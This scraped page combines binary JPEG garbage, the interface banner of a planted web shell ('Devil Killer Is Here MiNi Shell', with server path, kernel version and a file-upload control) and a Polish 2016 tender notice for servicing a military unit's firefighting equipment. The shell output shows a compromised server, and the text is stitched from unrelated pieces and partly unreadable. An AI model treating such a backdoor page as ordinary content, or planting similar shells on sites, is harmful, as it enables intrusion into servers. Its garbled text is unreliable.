JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160401/74566-N-2016.html

<p class="kh_header"><b>Grudziądz: PRZEGLĄDY OKRESOWE SPRZĘTU POŻARNICZEGO - SPRAWA NR 26/25016</b><br>
<b>Numer ogłoszenia: 74566 - 2016; data zamieszczenia: 01.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 13 Wojskowy Oddział Gospodarczy , ul. Czwartaków 3, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 261 48 32 90, 261 48 32 00, faks 261 48 32 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.13wog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa sektora finansów publicznych - wojsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEGLĄDY OKRESOWE SPRZĘTU POŻARNICZEGO - SPRAWA NR 26/25016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są okresowe przeglądy sprzętu pożarniczego, według zadań następująco:
Zadanie nr 1:Przegląd zestawów narzędzi hydraulicznych Holmatro-DPU 62D25- 1 zest.;   2060 PU Core - 1 zest;    DPU 61P20- 1 zest. ;   DPU 60P - 1 zest.
Zadanie nr 2:Przegląd okresowy pompy Lukas P-620 SG i narzędzi hydraulicznych
Zadanie nr 3:	Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych   
Zadanie nr 4:	Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych MSA 100 EFI
Zadanie nr 5:	Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000-TE
Zadanie nr 6:	Przegląd okresowy aparatów powietrznych nadciś. 1 butl. -  FENZY, masek aparatów oraz  butli kompozytowych
	Zadanie nr 7:	Przegląd okresowy pił spalinowych
Zadanie nr 8:	Przegląd okresowy przecinarek spalinowych do stali i betonu    
Zadanie nr 9:	Przegląd okresowy autopompy i układu wodno pianowego w samochodach pożarniczych
Zadanie nr 10:	Przegląd okresowy motopomp pożarniczych, pomp pływających, pomp szlamowych i pólszlamowych
Zadanie nr 11:	Przegląd okresowy agregatów prądotwórczych
Zadanie nr 12:	Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096 - 3264 - 5 szt.
Zadanie nr 13:	Przegląd okresowy poduszek niskociśnieniowych Vetter 
Zadanie nr 14:	Przegląd okresowy poduszek wysokociśnieniowych Holmatro
Zadanie nr 15:	Przegląd okresowy wentylatorów nadciśnieniowych PH-VP 450
Zadanie nr 16:	Przegląd okresowy Agregatu pompowego 8000/8 na przyczepie
Zadanie nr 17:	Przegląd okresowy motopomp pożarniczych TOHATSU
2.	Zakres wykonania usług przeglądów okresowych określonych jak powyżej należy wykonać co najmniej zgodnie z:
1)	Zakresem prac wyszczególnionym w  ust. 3 oraz warunkami umowy;
2)	Polskimi Normami ogólnie dostępnymi m.in. w Komitecie Normalizacyjnym;
3)	Instrukcjami obsługi lub eksploatacji danego urządzenia lub narzędzi oraz obowiązującej dokumentacji techniczno-ruchowej sprzętu;
4)	Obowiązującymi przepisami w zakresie wykonywanej usługi.
3.	Wymagany minimalny zakres czynności:
1)	Zadanie nr 1: Przegląd zestawów narzędzi hydraulicznych Holmatro-DPU 62D25- 1 zest.;   2060 PU Core - 1 zest;    DPU 61P20- 1 zest. ;   DPU 60P - 1 zest.
Nazwa czynności	
- wymiana filtrów powietrza
- wymiana świec zapłonowych
- sprawdzenie układu rozruchu  silnika          
- sprawdzenie parametrów pracy silnika
- sprawdzenie szczelności zwijadeł
- sprawdzenie szczelności przyłączy kości zwijadeł
- sprawdzenie szczelności króćca zaworu
- sprawdzenie szczelności kości przyłącza
- sprawdzenie szczelności szybkozłącza pompy
- sprawdzenie szczelności szybkozłączy narzędzi
- sprawdzenie szczelności i działania zaworu bezpieczeństwa
- sprawdzenie ciśnienia maksymalnego
- sprawdzenie sił nacisku i rozwarcia narzędzi
- wymiana oleju hydraulicznego 	

Ilość czynności w roku: raz w roku: wrzesień 	
Ilość zestawów ogółem: 4 zestawy

ZESTAW:	
Holmatro - DPU 62P25 - 1 zestaw	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja
2060 PU Core - 1 zestaw	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
DPU 61 P20	- 1 zestaw	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
DPU 60P Core - 1 zestaw MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)

2)	Zadanie nr 2: Przegląd okresowy pompy Lukas P-620 SG i narzędzi hydraulicznych
Nazwa czynności	
- wymiana filtrów powietrza
- wymiana świec zapłonowych 
- sprawdzenie układu rozruchu silnika           
- sprawdzenie parametrów pracy silnika
- sprawdzenie szczelności zwijadeł
- sprawdzenie szczelności przyłączy kości zwijadeł
- sprawdzenie szczelności króćca zaworu
- sprawdzenie szczelności kości przyłącza
- sprawdzenie szczelności szybkozłącza pompy
- sprawdzenie szczelności szybkozłączy narzędzi
- sprawdzenie szczelności zaworu bezpieczeństwa
- sprawdzenie ciśnienia maksymalnego
- sprawdzenie sił nacisku i rozwarcia narzędzi
- wymiana oleju hydraulicznego	

Ilość czynności w roku:	raz w roku:lipiec 	
Ilość zestawów ogółem: 1 zestaw

ZESTAW:	
pompa Lukas P-620 SG i narzędzia hydrauliczne	- 1 zestaw	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)

3)	Zadanie nr 3: Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych   
Nazwa czynności	
- wymiana filtra oczyszczania powietrza 
- wymiana filtra wstępnego powietrza 
- wymiana oleju 
- sprawdzenie działania zaworu bezpieczeństwa
- sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021
- dokonanie przeglądu  poprawności działania przyrządów pomiarowych 
- wymiana paska napędowego	
Ilość czynności w roku: dwa razy w roku:maj, listopad 	
Ilość sprzętu ogółem: 4 szt.
SPRZĘT	
COLTRI MCH-6 ETC - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
COLTRI MCH-6 EM - 1 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
CTC 100 - GX 160 - 1 szt.	MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja

4)	Zadanie nr 4: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych MSA 100 EFI

Nazwa czynności	
-wymiana filtra oczyszczania powietrza 
-wymiana filtra wstępnego powietrza
-wymiana oleju  
-sprawdzenie działania zaworu bezpieczeństwa
-sprawdzenie czystości  powietrza zgodnie z normą  PN-EN 12021
-dokonanie przeglądu  poprawności działania przyrządów pomiarowych
-sprawdzenie zaworów ssąco- tłoczących z wymianą    
-uszczelnienia         	

Ilość czynności w roku: dwa razy w roku: maj, listopad 	
Ilość sprzętu ogółem:1 szt.

SPRZĘT	
MSA 100 EFI - 1 szt.	MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)

5)	Zadanie nr 5: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000-TE
Nazwa czynności	
-wymiana filtra oczyszczania powietrza
-wymiana filtra wstępnego powietrza
-wymiana oleju
-sprawdzenie działania zaworu bezpieczeństwa
-sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021
-dokonanie przeglądu poprawności działania przyrządów pomiarowych           
-wymiana paska napędowego 
-wymiana pakietu naprawczego  po 500 godz. pracy  (lub po przepracowaniu pierwszego roku pracy)	
Ilość czynności w roku: 	
dwa razy 
w roku:
maj, listopad 	
Ilość sprzętu ogółem: 1 szt.

SPRZĘT:	
kompresor elektryczny do ładowania butli aparatów powietrznych -   Bauer Posejdon PE 3000-TE - 1 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)

6)	Zadanie nr 6: Przegląd okresowy aparatów powietrznych nadciś. 1 butl. -  FENZY, masek aparatów oraz  butli kompozytowych

Nazwa czynności	
1. Wymiana pakietu legalizacyjnego                                
Zakres wymiany :    
-sprężyna zaworu wydechowego
-membrana zaworu wydechowego                                    
-uszczelka zaworu air klik,                         
-membrana foniczna,                   
-uszczelka membrany fonicznej	
Ilość czynności w roku	raz w roku:maj	Ilość: 41 zestawów                  
2.	Legalizacja  UDT butli kompozytowych 6,8 l. 300 bar
Zakres czynności:
-odkręcenie zaworu, czyszczenie i dezynfekcja butli
-przeprowadzenie hydrostatycznego testu ciśnieniowego 450 bar
-odbiór przez UDT
-skręcenie zaworu i napełnienie  atestowanym powietrzem  oddechowym	
Ilość czynności w roku	raz w roku:maj (usługa w siedzibie Wykonawcy)	Ilość 60 szt.
3.	Przegląd  okresowy kompletnego aparatu powietrznego obejmujący następujące czynności:                                 
- sprawdzenie szczelności,
- dynamiczny test na sztucznym płucu                   
- konserwacja                                          
- dezynfekcja ,  
- kontrola końcowa,   
- dopuszczenie do użytku,             
- wpis  do książki paszportowej.	
Ilość czynności w roku	dwa razy w roku:maj, listopad	 Ilość: 41 zestawów

SPRZĘT:	
aparaty powietrzne nadciś. FENZY AERIS, maski aparatów - 41 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Legalizacja UDT butli kompozytowych - 60 szt.	MIEJSCE WYKONANIA USŁUGI: w siedzibie Wykonawcy

7)	Zadanie nr 7: Przegląd okresowy pił spalinowych
Nazwa czynności	
-wymiana filtra powietrza
-wymiana świec zapłonowych 
-sprawdzenie działania układu rozruchowego silnika
-sprawdzenie parametrów pracy silnika
-sprawdzenie działania hamulca bezpieczeństwa
-wymiana smoczka 
-ostrzenie łańcucha
-regulacja naciągu łańcucha
-regulacja pracy silnika	
Ilość czynności w roku: raz w roku:sierpień 	

Ilość sprzętu ogółem: 16 szt.

SPRZĘT	
MS-290	14 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
MS-290	2 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja

8)	Zadanie nr 8: Przegląd okresowy przecinarek spalinowych do stali i betonu    
Nazwa czynności	
-wymiana filtra powietrza
-wymiana świec zapłonowych
-sprawdzenie działania układu rozruchowego silnika
-sprawdzenie parametrów pracy silnika
-sprawdzenie działania hamulca bezpieczeństwa
-wymiana smoczka
-wymiana paska klinowego
-sprawdzenie mocowania tarczy tnącej
-regulacja pracy silnika 	

Ilość czynności w roku	raz w roku:sierpień 	
Ilość sprzętu ogółem: 10 szt.

SPRZĘT	
TS-400	5 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
TS-800	3 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
TS-400	2 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja


9)	Zadanie nr 9: Przegląd okresowy autopompy i układu wodno pianowego w samochodach pożarniczych
Nazwa czynności	
-sprawdzenie szczelności autopompy
-przegląd autopompy - smarowanie
-przegląd skrzyni napędowej autopompy
-przegląd wału napędowego autopompy
-przegląd urządzenia zasysającego
-przegląd zaworu głównego
-przegląd zaworów tłocznych
-przegląd manometrów i manowakuometrów
-sprawdzenie instalacji elektrycznej i automatyki sterowania autopompy
-próba sprawności podzespołów wodno-pianowych ,ciśnienia i wydajności autopompy,
-dokonanie przeglądu poprawności działania przyrządów pomiarowych	

Ilość czynności w roku	raz w roku:czerwiec 	
Ilość sprzętu ogółem: 12 szt.
Uwaga!  Dodatkowo w nw pojazdach należy dokonać następujących czynności: 
Scania G440 CB
- wymiany oleju w trokomacie
- sprawdzenie prawidłowej pracy systemu proszkowego
- sprawdzenie szczelności układu sterowania
- sprawdzenie prawidłowej pracy działka proszkowego ( sprawdzenie układu sterowania)
- wymiana manometru glicerynowego podciśnienia ssania wody  - 1  szt.
    
Jelcz 014 A32/10
- wymiana licznika obrotów silnika  - 1 szt. 
- wymiana dozownika środka pianotwórczego  -  1 szt.
- wymiana manowakuometru (01,5-01) -  1 szt.
- wymiana sita nasady 110  -  1 szt.

Star P142CJ A24/10 
- wymiana sita nasady 110  -  2 szt. 
- wymiana manowakuometru (01,5-01) -  1 szt.

Star 14.225 A20/10
- wymiana elektronicznego wskaźnika obrotów silnika  - 1 szt.
- wymiana sita nasady 110  -  1 szt.

Star 12.227 Zigler FP 16/8
- wymiana wskaźnika poziomu środka pianotwórczego - 2 szt. 
- wymiana wskaźnika poziomu wody  -  2 szt. 
- wymiana manowakuometru (01,5-01) -  1 szt. 
- wymiana licznika obrotów silnika  -  1 szt.

SPRZĘT	
STAR P142CJ A24/10	3 szt.	

STAR 14.225 A20/10	1 szt.	
JELCZ 014 A32/10	3 szt.	
JELCZ 010 A32/10	1 szt.	
STAR 12.227 Zigler FP 16/8	3 szt.	
SCANIA G440 CB 6x6 EHZ	1 szt.	
MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)

10)	Zadanie nr 10: Przegląd okresowy motopomp pożarniczych, pomp pływających, pomp szlamowych i pólszlamowych

Nazwa czynności	
- sprawdzenie szczelności pompy
- przegląd elektroniki silnika
- sprawdzenie regulatora obrotów
- przegląd pompy
- przegląd pompy zasysającej
- wymiana oleju w regulatorze obrotów
- sprawdzenie gaźnika
- wymiana świec zapłonowych
- wymiana filtra powietrza,
- dokonanie próby szczelności i ciśnienia
- przegląd trokomatów
- wymiana filtra paliwa	
Ilość czynności w roku: raz w roku:czerwiec 	
Ilość sprzętu ogółem:13 szt.
Sprzęt:	
motopompa pożarnicza M8/8-1 silnik Kohler - 1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
motopompa pożarnicza M8/8-1 silnik Kohler - 1 szt. MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja
pompy pływające Niagara 1 M4/2 -2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
pompa pływająca Niagara M4/2 Plus	-1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
pompa pływająca Posejdon M8/2 - 1 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja
pompy pływające Posejdon M8/2 - 4 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
pompa szlamowa KTX 80X Honda (woda zanieczyszczona) - 1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
pompy półszlamowa 
SST-50 - 2 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)


11)	Zadanie nr 11: Przegląd okresowy agregatów prądotwórczych
Nazwa czynności	
-przegląd elektroniki silnika
-wymiana świec zapłonowych
-wymiana filtra powietrza
-wymiana oleju w silniku
-wymiana filtra oleju
-sprawdzenie parametrów pracy silnika
-sprawdzenie parametrów pod obciążeniem (moc max)
-sprawdzenie zabezpieczenia prądnicy
-kontrola gniazd wtykowych poboru energii
-dokonanie przeglądu poprawności działania przyrządów pomiarowych	

Ilość czynności w roku	raz w roku:czerwiec 	
Ilość sprzętu ogółem: 12 szt.

Sprzęt:	
agregaty prądotwórcze 
GX 200 Honda - 3 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
agregat prądotwórczy ED - 2400 GX 160 Honda - 1 szt.MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
 agregaty prądotwórcze Fogo FH5540, silnik Honda GX270 - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
agregaty prądotwórcze 
G 200 Honda Geko 2500 EA/HHBA - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
agregaty prądotwórcze 
FOGO FV 5540 X - silnik Briggs Stratton 9HP - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
agregat prądotwórczy 5-8 KVA - 1 szt. MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja
agregat prądotwórczy Honda 4500 - 1 szt. MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja

12)	Zadanie nr 12: Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096 - 3264 - 5 szt.
Nazwa czynności	
przegląd i kalibracja
Ilość czynności w roku	 dwa razy
w roku:
maj, listopad	
Ilość sprzętu ogółem: 5 szt.

Sprzęt:	
mierniki gazów wybuchowych SCOTT 096-3264	5 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)

13)	Zadanie nr 13: Przegląd okresowy poduszek niskociśnieniowych  Vetter 
Nazwa czynności	
-sprawdzenie szczelności, przegląd reduktorów i sterowników 
-dokonanie przeglądu poprawności działania przyrządów pomiarowych	
Ilość czynności w roku	
raz
w roku:
wrzesień	
Ilość zestawów ogółem
2 zestawy

Sprzęt:	
Poduszki niskociśnieniowe Vetter (w skład wchodzi 6 poduszek)	1 zestaw	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
Poduszki niskociśnieniowe Vetter
(w skład wchodzi 6 poduszek)	1 zestaw	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja

14)	Zadanie nr 14: Przegląd okresowy poduszek wysokociśnieniowych Holmatro
Nazwa czynności	
-sprawdzenie szczelności,    
-przegląd reduktorów i sterowników
-dokonanie przeglądu poprawności działania 
-przyrządów pomiarowych	
Ilość czynności w roku	
raz
w roku:
wrzesień	
Ilość zestawów ogółem 4 zestawy

Sprzęt:	
Poduszki wysokociśnieniowe Holmatro	4 zestawy	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)

15)	Zadanie nr 15: Przegląd okresowy wentylatorów nadciśnieniowych PH-VP 450
Nazwa czynności	
- wymiana oleju
- wymiana filtrów
- wymiana świec zapłonowych
-przegląd zespołów elektroniki	
Ilość czynności w roku	
raz
w roku:
sierpień	
Ilość sprzętu ogółem: 11 szt. 

Sprzęt:	
wentylator PH-VP 450	10 szt.	MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
wentylator PH-VP 450	1 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja
16)	Zadanie nr 16: Przegląd okresowy Agregatu pompowego 8000/8 na przyczepie
Nazwa czynności	
-wymiana oleju
-wymiana filtra paliwa
-wymiana świec zapłonowych
-przeprowadzenie próby ciśnieniowej pod kątem szczelności	
Ilość czynności w roku	
raz
w roku:
wrzesień	
Ilość sprzętu ogółem 1 szt. 

Sprzęt:	
agregat pompowy 8000/8 na przyczepie	1 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)

17)	Zadanie nr 17: Przegląd okresowy motopomp pożarniczych TOHATSU
Nazwa czynności	
- sprawdzenie szczelności pompy
- przegląd elektroniki silnika
- sprawdzenie regulatora obrotów
- przegląd pompy
- przegląd pompy zasysającej
- wymiana oleju w regulatorze obrotów
- sprawdzenie gaźnika
- wymiana świec zapłonowych
- wymiana filtra powietrza
- dokonanie próby szczelności i ciśnienia
- przegląd  trokomatów
- wymiana filtra paliwa	
Ilość czynności w roku	raz w roku:
październik	
Ilość sprzętu ogółem 17 szt. 

Sprzęt:	
motopompy pożarnicze TOHATSU M8/8	1 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
motopompy pożarnicze  TOHATSU VC 72 AS	14 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
motopompy pożarnicze  TOHATSU M8/8 PO-380	2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)

4.	Wykonawca będzie zobowiązany do świadczenia usług stanowiących przedmiot zamówienia 
w cyklach jak określono w  ust. 3.
5.	Realizacja usług odbywać się będzie  w miejscowości Grupa gm. Dragacz ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog) i/lub miejscowści Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja (w zależności od zadania). Realizacja usługi z Zadania nr 6 poz. nr 2 winna odbywać się w siedzibie Wykonawcy.
6.	Wykonawca realizując usługi na terenie CSLog i 1 RBLog-Skład Gardeja zobowiązany jest do przestrzegania przepisów dotyczących ochrony środowiska, przepisów przeciwpożarowych
 i porządkowych obowiązujących na terenie danych jednostek.
7.	Po zrealizowaniu usługi Wykonawca winien uprzątnąć miejsce, w którym wykonywał czynności związane z realizacją usługi oraz odebrać zużyte części i płyny eksploatacyjne 
